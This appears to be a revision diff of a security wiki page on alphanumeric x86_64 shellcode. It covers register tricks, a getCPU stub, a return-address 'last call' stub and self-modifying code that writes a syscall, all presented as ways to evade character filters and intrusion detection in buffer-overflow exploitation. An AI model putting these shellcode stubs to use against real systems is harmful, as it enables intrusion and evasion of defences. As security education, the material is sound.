
Difference between revisions of "Shellcode/Alphanumeric"

From NetSec
(Example: Zeroing Out x86_64 CPU Registers)
 
(18 intermediate revisions by 2 users not shown)
Line 9: Line 9:
 
=Alphanumeric x86_64 register value and data manipulation=
 
=Alphanumeric x86_64 register value and data manipulation=
  
Given the limited set of instructions for alphanumeric shellcode, its important to note different methods to manipulate different registers within the confines of the limited instruction set. Identifying these leads to '''mov emulations''', which make up most of the actual code.
+
Given the limited set of instructions for alphanumeric shellcode, it is important to note different methods to manipulate different registers within the confines of the limited instruction set. Identifying these leads to '''mov emulations''', which make up most of the actual code.  
  
==Push==
+
Alphanumeric data can be [[Shellcode/Appendix/Alphanumeric_opcode#Push:_Alphanumeric_x86_64_data|pushed in one-byte, two-byte, and four-byte]] quantities at once. [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 Extended Registers|Pushing the 64 bit registers RAX-RDI]] is done using a single upper case P-W (\x50-\x57) depending on which register is being pushed. Prefixing with "A" (for [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 General Registers|general registers R8-R15]]) or "f" (for 16 bit registers [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 16 bit Registers|AX-DI]]) gives access to push 32 registers using alphanumeric shellcode. For [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 16 bit General Registers|16 bit general registers R8W-R15W]] "f" is prefixed to the corresponding R8-R15 register push.
  
Alphanumeric data can be [[Shellcode/Appendix/Alphanumeric_opcode#Push:_Alphanumeric_x86_64_data|pushed in one-byte, two-byte, and four-byte]] quantities at once.
+
Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode. [[Shellcode/Appendix/Alphanumeric_opcode#Pop: x86_64 Extended Registers|This is limited to RAX, RCX, and RDX.]]  As with push, the extended register shellcode is prefixed to access 16 bit and general registers.  This gives a total of 12 registers (6 full size and 6 16 bit) that can be pop(ed).
 
+
[[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 Extended Registers|Pushing the 64 bit registers RAX-RDI]] is done using a single upper case P-W (\x50-\x57) dependent on which register is being pushed. Prefixing with "A" (for general registers R8-R15) or "f" for 16 bit registers (AX-DI) gives access to push 32 registers using alphanumeric shellcode.
+
 
+
For the [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 General Registers|general registers R8-R15]] "A" is prefixed to the corresponding RAX-RDI register push.
+
For the [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 16 bit Registers|16 bit registers AX-DI]] "f" is prefixed to the corresponding RAX-RDI register push.
+
For the [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 16 bit General Registers|16 bit general registers R8B-R15b]] "f" is prefixed to the corresponding R8-R15 register push.
+
 
+
==Pop==
+
 
+
Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode.   [[Shellcode/Appendix/Alphanumeric_opcode#Pop: x86_64 Extended Registers|This is limited to RAX, RCX, and RAX.]]  As with push, the extended register shellcode is prefixed to access 16 bit and general registers.  This gives the ability to pop a total of 12 (6 full size and 6 16 bit) registers able to be pop(ed).  
+
  
 
For [[Shellcode/Appendix/Alphanumeric_opcode#Pop: x86_64 General Registers|general registers, RAX-RCX]] are prefixed with "A" for the corresponding R8-R10 pop. The [[Shellcode/Appendix/Alphanumeric_opcode#x86_64 16 bit registers|16 bit registers]] (using 0x66 or 'f' [sometimes fA] prefix):
 
For [[Shellcode/Appendix/Alphanumeric_opcode#Pop: x86_64 General Registers|general registers, RAX-RCX]] are prefixed with "A" for the corresponding R8-R10 pop. The [[Shellcode/Appendix/Alphanumeric_opcode#x86_64 16 bit registers|16 bit registers]] (using 0x66 or 'f' [sometimes fA] prefix):
Line 41: Line 31:
 
*%rax-%rdi
 
*%rax-%rdi
  
== Prefixes ==
+
There are 5 main registers and 5 special 64 bit registers that can be push(ed), but not pop(ed):
 
+
Examining this next section, there are 5 main registers, and 5 special 64 bit registers that can be push(ed), but not pop(ed):
+
  
 
*%rbx
 
*%rbx
Line 51: Line 39:
 
*%rdi
 
*%rdi
  
This can be written using alphanumeric bytecode instructions and operands only through the use of any of the 6 full control registers by emulating for mov with push and pop.  Using only the registers already accessed, an attempt will be made to get instructions for to set values.
+
This can be written using alphanumeric bytecode instructions and operands only through the use of any of the 6 full control registers by emulating for mov with push and pop.  Using only the registers already accessed, an attempt will be made to get instructions to set values.
  
 
The special register prefix has been identified:
 
The special register prefix has been identified:
Line 63: Line 51:
 
Note the identification of all the [[Shellcode/Appendix/Alphanumeric_opcode#Prefixes|alphanumeric overrides and prefixes]]. These overrides are very similar to those for 32 bit platforms.
 
Note the identification of all the [[Shellcode/Appendix/Alphanumeric_opcode#Prefixes|alphanumeric overrides and prefixes]]. These overrides are very similar to those for 32 bit platforms.
  
== Operands ==
+
Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions.  For example, take [[Shellcode/Appendix/Alphanumeric_opcode#Xor_Pop_Operands|this xor instruction]]. The %rax register can be changed to %rcx or %rdx using the 0x59 ''Y'' and 0x5a ''Z'' opcodes in place of the 0x58 ''X'' [[Shellcode/Appendix/Alphanumeric_opcode#Xor_Move_To_%25ebx|opcode]].
 
+
Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions.  For example, take [[Shellcode/Appendix/Alphanumeric_opcode#Xor_Pop_Operands|this xor instruction.]] The %rax register can be changed to %rcx or %rdx using the 0x59 (Y) and 0x5a (Z) opcodes in place of the 0x58 (X) [[Shellcode/Appendix/Alphanumeric_opcode#Xor_Move_To_%ebx|opcode]].
+
  
 
Whenever there's a controllable register, the notation {reg} is used to recognize it as an option.  In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, [[Shellcode/Appendix/Alphanumeric_opcode#Byte_Syntax_Example|for example]].
 
Whenever there's a controllable register, the notation {reg} is used to recognize it as an option.  In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, [[Shellcode/Appendix/Alphanumeric_opcode#Byte_Syntax_Example|for example]].
Line 71: Line 57:
 
The opcodes for '''%rax''', '''%rcx''', and '''%rdx''' are important and thus will be used frequently.  When encountering multiple operands, the operand number is used in the notation for readability purposes.
 
The opcodes for '''%rax''', '''%rcx''', and '''%rdx''' are important and thus will be used frequently.  When encountering multiple operands, the operand number is used in the notation for readability purposes.
  
== The rbx, rsp, and rbp registers ==
 
 
Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful.  Full control over the %rbx register is not available, however, write access to its sub-registers is available:
 
Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful.  Full control over the %rbx register is not available, however, write access to its sub-registers is available:
 
* %ebx
 
* %ebx
Line 83: Line 68:
 
*Movslq
 
*Movslq
  
 
+
To access the %ss segment, insert the prefix at the beginning of the bytecode of instructions (e.g. "63*?" instead of "3*?").  If use of the special 64 bit registers is preferred, 0x41 or "A" is placed at the beginning of the bytecode.  If the use of both is required, the %ss segment register prefix first, e.g. '6A3*?' must always be used.  When using one of the 64 bit force operators, one can use any of those instructions on a 32 bit register with an override to treat it as its 64-bit counterpart (in this case, 0x48).
To access the %ss segment, insert the prefix at the beginning of the bytecode of instructions (e.g. "63*?" instead of "3*?").  If preferred to use the special 64 bit registers,  
+
0x41 or "A" is placed at the beginning of the bytecode.  If the use of both is required, the %ss segment register prefix first, e.g. '6A3*?' must always be used.  When using one of the 64 bit force operators, one can use any of those instructions on a 32 bit register with an override to treat it as its 64-bit counterpart (in this case, 0x48).
+
  
 
{| class="wikitable"
 
{| class="wikitable"
Line 97: Line 80:
 
|}
 
|}
  
To set the value of %rbx  directly, imul, xor, and movslq can be used.  It's similar for other registers:
+
To set the value of %rbx  directly, imul, xor, and movslq can be used.  It is similar for other registers:
 
* %rbp
 
* %rbp
 
* %rsp
 
* %rsp
  
==Xor==
+
Left over are %rsp, %rbp, %rdi, and %rsi.  Taking a closer look at xor, at [[Shellcode/Appendix/Alphanumeric_opcode#xors|0x30 and ending at 0x35]] are these valuable xor commands:
Left over are %rsp, %rbp, %rdi, and %rsi.  Taking a closer look at xor, at [[Shellcode/Appendix/Alphanumeric_opcode#xors|0x30 and ending at 0x35]] are these valuable xor commands.
+
 
+
'''[[Shellcode/Appendix/Alphanumeric_opcode#0x30|0x30]]''' is a multi-byte xor instruction.  Requiring at least two operands (even if register denote):
+
  
'''[[Shellcode/Appendix/Alphanumeric_opcode#0x31|0x31]]''' is as flexible as '''0x30'''. Not all permutations are included for brevity.
+
* '''[[Shellcode/Appendix/Alphanumeric_opcode#0x30|0x30]]''' is a multi-byte xor instruction. Requiring at least two operands (even if one of them denotes a register).
  
'''[[Shellcode/Appendix/Alphanumeric_opcode#0x32|0x32]]''' is just as flexible, although the offsets will change source side rather than destination side. Not all permutations are included for brevity.
+
* '''[[Shellcode/Appendix/Alphanumeric_opcode#0x31|0x31]]''' is as flexible as '''0x30'''.
  
'''[[Shellcode/Appendix/Alphanumeric_opcode#0x33|0x33]]''' is the opposite of 0x31 and as flexible. Not all permutations are included for brevity.
+
* '''[[Shellcode/Appendix/Alphanumeric_opcode#0x32|0x32]]''' is just as flexible, although the offsets will change source side rather than destination side.
  
== The rsi and rdi registers ==
+
* '''[[Shellcode/Appendix/Alphanumeric_opcode#0x33|0x33]]''' is the opposite of 0x31 and as flexible.
  
Combining the knowledge of xor with the knowledge of the stack.  When any data is pushed, the data is accessible at %ss:(%rsp).  Knowing this, another register can be used in the available space (e.g. %rcx) to set values on some of the more difficult registers:
+
Combining the knowledge of xor with the knowledge of the stack, when any data is pushed, the data is accessible at %ss:(%rsp).  Knowing this, another register can be used in the available space (e.g. %rcx) to set values on some of the more difficult registers:
  
 
*%rbx
 
*%rbx
Line 189: Line 169:
  
 
This can come in quite handy when chunking large pieces of data to 0.
 
This can come in quite handy when chunking large pieces of data to 0.
 +
 +
= Environment =
 +
== GetCPU ==
 +
 +
Architecture can only be determined when compatible channels between the target [[instruction set architecture]]s can be isolated.  As long as the [[assembly#instructions|instructions]] perform valid behavior and do not cause [[segmentation fault|access faults]] on [[operating system]]s native to the architecture, it is possible to use a single bytecode sequence in order to determine architecture across a variety of processors.  It generally takes a great amount of familiarity and experience with two or more given instruction sets to write [[shellcode]] for multiple architectures.
 +
 +
The x86_64 [[instruction set architecture]] (also known as ''x64'') does not vastly differ from x86 because of '''AMD''''s  correcting of Intel's calling convention and architecture. 
 +
 +
An [[Shellcode/Appendix/Alphanumeric_opcode#x86_Intercompatibility|alphanumeric instruction compatibility chart]] can be derived by cross referencing [[Shellcode/Appendix/Alphanumeric_opcode#64-bit_alphanumeric_opcodes|available alphanumeric 64 bit instructions]] with [[Shellcode/Appendix/Alphanumeric_opcode#32-bit_printable_opcodes|available printable 32 bit instructions]].
 +
 +
=== Inter-compatibility theory ===
 +
Specifically non-compatible are the 32 and 64 bit opcodes in the range '''0x40-0x4f''', as they allow a 32 bit processor to increment or decrement its general-purpose registers, but become prefixes for manipulation of 64 bit registers and 8 additional 64 bit general purpose registers in x64 environments, '''%r8-%r15'''. 
 +
 +
Since not ''all'' opcodes are intercompatible, yet comparisons and conditional jumps ''are'' intercompatible, it is possible to determine the architecture of an x86 processor using exclusively alphanumeric opcodes.
 +
 +
By making use of these additional registers (which 32 bit processors do not have), one can perform an operation that will set a value on a different register in the two processors. Following this, a conditional statement can be made against one of the two registers to determine if the value was set. 
 +
 +
Using the '''pop''' instruction is the most effective way to set the value of a register due to instructional limitations (to keep the code alphanumeric).  Using an alternative register to %rsp or %esp as a placeholder for the stack pointer enables the use of an effective conditional statement to determine if the value of a register is equal to the most recent thing pushed or popped from the stack.
 +
 +
=== Practically Applied: Code ===
 +
This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns '''equal''' on a 32 bit system and '''not equal''' on a 64 bit system. 
 +
 +
When implementing this bytecode, a conditional jump afterwards may be best reserved for the '''t''' and '''u''' instructions, '''jump if equal''' and '''jump if not equal''', respectively.
 +
 +
* Assembled:
 +
:'''TX4HPZTAZAYVH92'''
 +
 +
* Disassembly:
 +
The table here shows opcodes on the left when instructions are equivalent, and opcodes on the right when they differ per [[instruction set architecture|instruction set]].
 +
{| class="wikitable"
 +
|-
 +
! OpCodes
 +
! x86
 +
! x64
 +
|-
 +
| '''54'''
 +
| <source lang="asm">push %esp</source>
 +
| <source lang="asm">push %rsp</source>
 +
|-
 +
| '''58'''
 +
| <source lang="asm">pop %eax</source>
 +
| <source lang="asm">pop %rax</source>
 +
|-
 +
| '''34 48'''
 +
| <source lang="asm">xor $0x48, %al</source>
 +
| <source lang="asm">xor $0x48, %al</source>
 +
|-
 +
| '''50'''
 +
| <source lang="asm">push %eax</source>
 +
| <source lang="asm">push %rax</source>
 +
|-
 +
| '''5a'''
 +
| <source lang="asm">pop %edx</source>
 +
| <source lang="asm">pop %rdx</source>
 +
|-
 +
| '''54'''
 +
| <source lang="asm">push %esp</source>
 +
| <source lang="asm">push %rsp</source>
 +
|-
 +
| <div align="right"><font size="-1">'''''41''''' <br />
 +
'''''5a'''''</font></div>
 +
|<source lang="asm">inc %ecx
 +
pop %edx</source>
 +
|<source lang="asm">pop %r10</source>
 +
|-
 +
| <div align="right"><font size="-1">'''''41'''''<br />
 +
'''''59'''''</font></div>
 +
|<source lang="asm">inc %ecx
 +
pop %ecx</source>
 +
|<source lang="asm">pop %r9</source>
 +
|-
 +
| '''56'''
 +
|<source lang="asm">push %esi</source>
 +
|<source lang="asm">push %rsi</source>
 +
|-
 +
| <div align="right"><font size="-1">'''''48'''''<br />
 +
'''''39 32'''''</font></div>
 +
|<source lang="asm">dec %eax
 +
cmp %esi,(%edx)</source>
 +
|<source lang="asm">cmp %rsi,(%rdx)</source>
 +
|}
 +
 +
This code executes similarly, but not identically, on both a 32-bit and 64-bit system. The key discrepancy between how the two architectures execute this code is centered around the opcodes "0x41 - 0x4f".
 +
 +
Under a 32-bit architecture, this code pops the value of esp (which was pushed onto the stack previously) into edx and increments ecx. Since the esp register is a pointer to the top of the stack, edx now contains a pointer to the top of the stack. After this is done, the shellcode continues on to push esi onto the stack, so the value of esi now resides at the top of the stack. When the code executes its final comparison, "cmp %esi, (%edx)", it is comparing the value of esi to the value that edx points to. As edx points to the top of the stack, and because esi has just been pushed to the top of the stack, the resulting comparison is between the value of esi and the value of esi. Therefore, ''equal'' is returned.
 +
 +
Under a 64-bit architecture this shellcode returns ''not equal''. The opcodes "41 5a 41 59" have a different function: instead of popping the value of rsp into rdx, they pop it into the 64-bit register %r10 without incrementing %ecx or %rcx, as 0x41 is used as a prefix to select the additional 64-bit registers. As a result, when the final comparison is made between rsi and the value referenced by rdx, it returns not equal, as rdx does not point to the top of the stack.
 +
 +
On a 64-bit system, this will not cause a [[segmentation fault|segfault]] because (%rdx) points to somewhere inside the stack.
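
The two execution paths described above can be traced with a small model. This is only a sketch in Python, not part of the shellcode: the function name <code>run_getcpu</code>, the starting stack pointer and the %esi/%rsi value are assumptions chosen for illustration, and any stack slot the code never wrote is treated as holding "some other value".

```python
def run_getcpu(word: int, rex_prefixes: bool,
               sp: int = 0x7FFFF000, si: int = 0x1234) -> bool:
    """Trace TX4HPZTAZAYVH92 and return True when the final cmp is 'equal'.

    word         -- stack slot size in bytes (4 for x86, 8 for x64)
    rex_prefixes -- True when 0x41/0x48 act as prefixes (x64) instead of inc/dec
    """
    mem = {}  # sparse model of the stack; unwritten slots read as None
    reg = {"sp": sp, "si": si, "ax": 0, "cx": 0, "dx": 0, "r9": 0, "r10": 0}

    def push(value):
        reg["sp"] -= word
        mem[reg["sp"]] = value

    def pop(name):
        reg[name] = mem.get(reg["sp"])
        reg["sp"] += word

    push(reg["sp"])          # 54     push %esp / %rsp (old value is stored)
    pop("ax")                # 58     pop  %eax / %rax
    reg["ax"] ^= 0x48        # 34 48  xor  $0x48, %al
    push(reg["ax"])          # 50     push %eax / %rax
    pop("dx")                # 5a     pop  %edx / %rdx
    push(reg["sp"])          # 54     push %esp / %rsp
    if rex_prefixes:
        pop("r10")           # 41 5a  pop %r10
        pop("r9")            # 41 59  pop %r9
    else:
        reg["cx"] += 1       # 41     inc %ecx
        pop("dx")            # 5a     pop %edx
        reg["cx"] += 1       # 41     inc %ecx
        pop("cx")            # 59     pop %ecx
    push(reg["si"])          # 56     push %esi / %rsi
    if not rex_prefixes:
        reg["ax"] -= 1       # 48     dec %eax (a prefix on x64)
    return mem.get(reg["dx"]) == reg["si"]   # 39 32  cmp %esi,(%edx)
```

With these assumed starting values, <code>run_getcpu(4, False)</code> models the 32 bit path and <code>run_getcpu(8, True)</code> models the 64 bit path.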
 +
 +
== Last call ==
 +
{{code|text=<center>Assembled ''x64''<br />'''XTX4E4UH10H30'''</center>}}
 +
 +
The steps taken in order to obtain the address to the beginning of the [[shellcode]] in only [[Alphanumeric_shellcode|alphanumeric]] code are a little more complex.
 +
 +
First, to prevent destroying the return pointer (the target data), at least 8 must be added to the stack pointer. This can be done with the use of any conventional ''pop'' operation, in this case, ''pop %rax'', which then moves ''%rsp'' into ''%rax'' through a ''[[push]]'' / ''[[pop]]'' mov emulation.
 +
 +
{{code|text=<source lang="asm">
 +
  pop %rax
 +
  push %rsp                # move pointer to %rsp into %rax
 +
  pop %rax
 +
</source>}}
 +
 +
 +
Because the ''pop'' has added 0x8 to ''%rsp'', 0x10 must be subtracted from ''%rax'' in order to access the return pointer. This is emulated by [[Bitwise_math#XOR|XOR]]ing ''%al'' with 0x45 and then 0x55:
 +
 +
 +
{{code|text=<source lang="asm">
 +
  xor $0x45,%al            # subtract 0x10 from %rax
 +
  xor $0x55,%al
 +
</source>}}
 +
 +
This effectively runs a ''[[not]]'' operation against a single bit (0x45 xor 0x55 = 0x10).  Because of this, the operation either adds or subtracts 0x10 depending on whether that bit of ''%al'' was already set, so it is not guaranteed to work on its first execution. This is easily mitigated through repeated execution (and it may not work at times with ASLR disabled).
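
The add-or-subtract behaviour can be checked numerically. The snippet below is a minimal sketch in Python, used here only as a calculator; the helper name <code>toggle_0x10</code> and the sample values of ''%al'' are assumptions made for illustration.

```python
def toggle_0x10(al: int) -> int:
    """Apply xor $0x45,%al then xor $0x55,%al to an 8 bit value."""
    return (al ^ 0x45 ^ 0x55) & 0xFF


# The two immediates differ only in bit 4, so together they flip that one bit.
COMBINED_MASK = 0x45 ^ 0x55

# Sample low bytes of %rax (hypothetical): one with bit 4 set, one without.
bit_set = 0x38      # flipping bit 4 subtracts 0x10
bit_clear = 0x28    # flipping bit 4 adds 0x10
```

Here <code>toggle_0x10(bit_set)</code> gives 0x28 and <code>toggle_0x10(bit_clear)</code> gives 0x38, which is the "+ or -" behaviour described above.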
 +
 +
The most recently returned-from [[return address]] is then moved into ''%rsi'' through the use of an ''[[xor]]'' mov emulation:
 +
{{code|text=<source lang="asm">
 +
  xor %rsi,(%rax)
 +
  xor (%rax),%rsi          # move address to last instruction into %rsi
 +
</source>}}
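
As a sanity check, the assembled string for this section can be decoded back to its opcode bytes, and the two-step xor can be modelled to confirm that ''%rsi'' ends up holding the original memory value. This is a sketch in Python rather than assembly; <code>xor_load</code> is a hypothetical helper name and the sample values are arbitrary.

```python
LAST_CALL = b"XTX4E4UH10H30"

# pop %rax; push %rsp; pop %rax; xor $0x45,%al; xor $0x55,%al;
# xor %rsi,(%rax); xor (%rax),%rsi
EXPECTED = bytes.fromhex("58 54 58 3445 3455 483130 483330")


def xor_load(mem: int, rsi: int) -> tuple:
    """Model xor %rsi,(%rax) followed by xor (%rax),%rsi.

    Returns (new memory value, new %rsi value).
    """
    mem ^= rsi   # xor %rsi,(%rax): memory now holds mem ^ rsi
    rsi ^= mem   # xor (%rax),%rsi: rsi ^ (mem ^ rsi) == original mem
    return mem, rsi
```

Note that the memory operand is overwritten in the process: only ''%rsi'' ends up with the original value.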
  
 
=Example: Zeroing Out x86_64 CPU Registers=
 
=Example: Zeroing Out x86_64 CPU Registers=
Line 304: Line 403:
 
To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code.  The '''xor''' and '''imul''' instructions can then be used to set values on registers.
 
To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code.  The '''xor''' and '''imul''' instructions can then be used to set values on registers.
  
==The Offset==
+
== Writing the syscall ==
 +
The very first part of the code is used to determine location and write a syscall to the end. 
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
.text
 
.global _start
 
_start:
 
 
   pop %rax
 
   pop %rax
   push %rsp                 # move pointer to %rsp into %rax
+
   push %rsp
 
   pop %rax
 
   pop %rax
   xor $0x65, %al           # subtract 0x10 from %rax
+
   xor $0x65,%al
   xor $0x75, %al
+
   xor $0x75,%al
   movslq 0x34(%rax), %rsi   # zero out %rsi
+
   xor %rsi, (%rax)  # mov emulated into rsi
  xor 0x34(%rax), %rsi
+
   xor (%rax), %rsi
  movslq 0x34(%rax), %rdi   # zero out %rsi
+
   push %rsi
  xor 0x34(%rax), %rdi
+
   xor (%rax), %rsi         # move address to last instruction into %rax
+
   push %rsi  
+
 
   pop %rcx
 
   pop %rcx
 
+
  pushq $0x3030474a
   push %rcx
+
   pop %rax
  push [len]
+
   xor %eax,0x64(%rcx)
   xor (%rax), %rdi
+
 
+
  ; (%rcx, %rdi, 1) = addr of first nops
+
 
+
 
</source>}}
 
</source>}}
  
==The Syscall==
 
* Now that the offset to an address in front of executing instructions has been obtained, 4 bytes must be nulled for the new instructions to be written:
 
{{code|text=<source lang="asm">
 
        movslq (%rcx,%rdi,1), %rsi
 
        xor %esi, (%rcx,%rdi,1)
 
</source>}}
 
  
 
* This next xor comes out to 0x0000050f, which when moved onto the stack becomes 0x0f050000.  0x0f05 is the machine code for a '''syscall'''.
 
* This next xor comes out to 0x0000050f, which when moved onto the stack becomes 0x0f050000.  0x0f05 is the machine code for a '''syscall'''.
{{code|text=<source lang="asm">
+
0x3030474a xor 30304245 -- the "EB00" at the end of the shellcode:
        push $0x3030474a
+
{{code|text=<source lang="asm"> rex.RB
        pop %rax
+
  rex.X xor %sil,(%rax)</source>}}
        xor $0x30304245, %eax
+
</source>}}
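
The constants used in this step can be verified with a few lines of Python (used here only as a calculator, not as part of the shellcode). The variable names are assumptions made for illustration.

```python
PUSHED = 0x3030474A   # immediate pushed onto the stack
MASK = 0x30304245     # immediate xor'ed against it

result = PUSHED ^ MASK

# x86 stores integers little-endian, so the low byte comes first in memory.
result_in_memory = result.to_bytes(4, "little")
pushed_as_text = PUSHED.to_bytes(4, "little").decode("ascii")
mask_as_text = MASK.to_bytes(4, "little").decode("ascii")
```

The result is 0x0000050f, which is laid out in memory as the bytes 0f 05 00 00, and both immediates are alphanumeric when viewed as text ("JG00" and "EB00").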
+
  
* The %rax register now contains 0x050f.  Put 0x0f050000 at (%rcx) - then set the stack pointer back.
+
* The 'EB' in 'EB00' at the end of the shellcode has become 0x050f.
{{code|text=<source lang="asm">
+
        push %rax
+
        pop %rax                        # Garbage reg
+
</source>}}
+
 
+
* A '''mov emulation''' is used to mov 0x0f05 from (%rcx) to %rcx + %rdi through the %rsi register, writing the syscall instructions:
+
{{code|text=<source lang="asm">
+
        movslq (%rcx), %rsi
+
        xor %esi, (%rcx,%rdi,1)
+
</source>}}
+
  
 
==Arguments==
 
==Arguments==
Line 440: Line 512:
 
   # exit
 
   # exit
 
   root ~ #
 
   root ~ #
 +
 +
[[Category:Shellcode]]
 +
{{Social}}

Latest revision as of 02:31, 25 April 2013

Alphanumeric shellcode is similar to ascii shellcode in that it is used to bypass character filters and evade intrusion-detection during buffer overflow exploitation. Alphanumeric shellcode can be used to determine a number of factors about the target environment, including the return pointer via a last call technique or the instruction set architecture using a getCPU stub. Available alphanumeric opcodes for the 64-bit x86 architecture limit the use of modifiers to pop, movslq, xor, and imul.


While it is possible to write x86 intercompatible alphanumeric shellcode, this article primarily documents alphanumeric code for the 64 bit x86 architecture.
Shellcode/Alphanumeric requires a basic understanding of bitwise math, assembly and shellcode.


Special thanks to hatter for his contributions to this article.

Alphanumeric x86_64 register value and data manipulation

Given the limited set of instructions for alphanumeric shellcode, it is important to note different methods to manipulate different registers within the confines of the limited instruction set. Identifying these leads to mov emulations, which make up most of the actual code.

Alphanumeric data can be pushed in one-byte, two-byte, and four-byte quantities at once. Pushing the 64 bit registers RAX-RDI is done using a single upper case P-W (\x50-\x57) depending on which register is being pushed. Prefixing with "A" (for general registers R8-R15) or "f" (for 16 bit registers AX-DI) gives access to push 32 registers using alphanumeric shellcode. For 16 bit general registers R8W-R15W "f" is prefixed to the corresponding R8-R15 register push.
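
The push encodings described above can be reproduced with a short script. This is a minimal sketch in Python (not the article's assembly); the helper names <code>push_bytes</code> and <code>is_alphanumeric</code> are assumptions made for illustration, and only the 64 bit forms are covered.

```python
# Register order follows the x86 register numbering 0..7.
LOW_REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
HIGH_REGS = ["r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]


def push_bytes(reg: str) -> bytes:
    """Return the encoding of `push reg` for a 64 bit register."""
    if reg in LOW_REGS:
        return bytes([0x50 + LOW_REGS.index(reg)])
    if reg in HIGH_REGS:
        # 0x41 ('A') is the prefix that selects r8-r15.
        return bytes([0x41, 0x50 + HIGH_REGS.index(reg)])
    raise ValueError(f"unknown register: {reg}")


def is_alphanumeric(code: bytes) -> bool:
    """True when every byte is an ASCII letter or digit."""
    return code.isalnum()
```

For example, <code>push_bytes("rsi")</code> yields the single byte "V" and <code>push_bytes("r9")</code> yields "AQ".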

Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode. This is limited to RAX, RCX, and RDX. As with push, the extended register shellcode is prefixed to access 16 bit and general registers. This gives a total of 12 registers (6 full size and 6 16 bit) that can be pop(ed).

For general registers, RAX-RCX are prefixed with "A" for the corresponding R8-R10 pop. The 16 bit registers (using 0x66 or 'f' [sometimes fA] prefix):

Using push and pop the values of 6 fullsize CPU registers can be set:

  • %rax
  • %rcx
  • %rdx
  • %r8
  • %r9
  • %r10
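
The reason pop is restricted to three base registers can be seen by listing the single-byte pop opcodes as characters. This is a small Python sketch for illustration only; the names <code>pop_opcode</code> and <code>POPPABLE</code> are assumptions, not part of the original article.

```python
LOW_REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]


def pop_opcode(reg: str) -> int:
    """Single-byte opcode of `pop reg` (0x58 plus the register number)."""
    return 0x58 + LOW_REGS.index(reg)


# Only 0x58-0x5a ('X', 'Y', 'Z') are letters; 0x5b-0x5f are '[', '\', ']', '^', '_'.
POPPABLE = [reg for reg in LOW_REGS if chr(pop_opcode(reg)).isalnum()]
NOT_POPPABLE = [reg for reg in LOW_REGS if reg not in POPPABLE]
```

<code>NOT_POPPABLE</code> comes out as the same five registers that can be pushed but not popped.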

Or get any values of 16 fullsize CPU registers to the top of the stack:

  • %r8-%r15
  • %rax-%rdi

There are 5 main registers and 5 special 64 bit registers that can be push(ed), but not pop(ed):

  • %rbx
  • %rsp
  • %rbp
  • %rsi
  • %rdi

This can be written using alphanumeric bytecode instructions and operands only through the use of any of the 6 full control registers, by emulating mov with push and pop. Using only the registers already accessed, an attempt will be made to find instructions that set values.

The special register prefix has been identified:

 0x41, 'A'

The word operand override has been identified,

 0x66, 'f'.

Note the identification of all the alphanumeric overrides and prefixes. These overrides are very similar to those for 32 bit platforms.

Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions. For example, take this xor instruction. The %rax register can be changed to %rcx or %rdx using the 0x59 Y and 0x5a Z opcodes in place of the 0x58 X opcode.

Whenever there's a controllable register, the notation {reg} is used to recognize it as an option. In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, for example.

The opcodes for %rax, %rcx, and %rdx are important and thus will be used frequently. When encountering multiple operands, the operand number is used in the notation for readability purposes.

Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful. Full control over the %rbx register is not available, however, write access to its sub-registers is available:

  •  %ebx
  •  %bx
  •  %bh
  •  %bl

Upon further investigation, this opened up access to multiple additional registers using:

  • Xor
  • Imul
  • Movslq

To access the %ss segment, insert the prefix at the beginning of the bytecode of instructions (e.g. "63*?" instead of "3*?"). If use of the special 64 bit registers is preferred, 0x41 or "A" is placed at the beginning of the bytecode. If the use of both is required, the %ss segment register prefix first, e.g. '6A3*?' must always be used. When using one of the 64 bit force operators, one can use any of those instructions on a 32 bit register with an override to treat it as its 64-bit counterpart (in this case, 0x48).

Assembly Hexadecimal Alpha
imul   $0x[byte1],0x[byte2]({reg64}),{reg64}
\x48\x6b\x??\x#2\x#1 Hk*21
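
To make the "Hk*21" pattern concrete, the sketch below builds the five bytes for one instance of this imul form. It is written in Python for illustration; <code>imul_imm8_disp8</code> is a hypothetical helper, it assumes a one-byte displacement, and it does not handle %rsp as the base register (which would need an extra SIB byte) or the r8-r15 registers.

```python
REG_NUM = {"rax": 0, "rcx": 1, "rdx": 2, "rbx": 3,
           "rsp": 4, "rbp": 5, "rsi": 6, "rdi": 7}


def imul_imm8_disp8(imm8: int, disp8: int, base: str, dest: str) -> bytes:
    """Encode imul $imm8, disp8(%base), %dest for 64 bit operands."""
    if base == "rsp":
        raise ValueError("%rsp as base needs a SIB byte, not covered here")
    # ModRM: mod=01 (8 bit displacement), reg=destination, rm=base register.
    modrm = (0b01 << 6) | (REG_NUM[dest] << 3) | REG_NUM[base]
    # 0x48 is the 64 bit override, 0x6b the imul opcode; the displacement
    # byte precedes the immediate byte in the encoding.
    return bytes([0x48, 0x6B, modrm, disp8, imm8])


rbx_example = imul_imm8_disp8(0x30, 0x30, "rax", "rbx")
rbp_example = imul_imm8_disp8(0x30, 0x30, "rax", "rbp")
```

Under these assumptions <code>rbx_example</code> is "HkX00" and <code>rbp_example</code> is "Hkh00"; prefixing either with "6" adds the %ss segment override.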

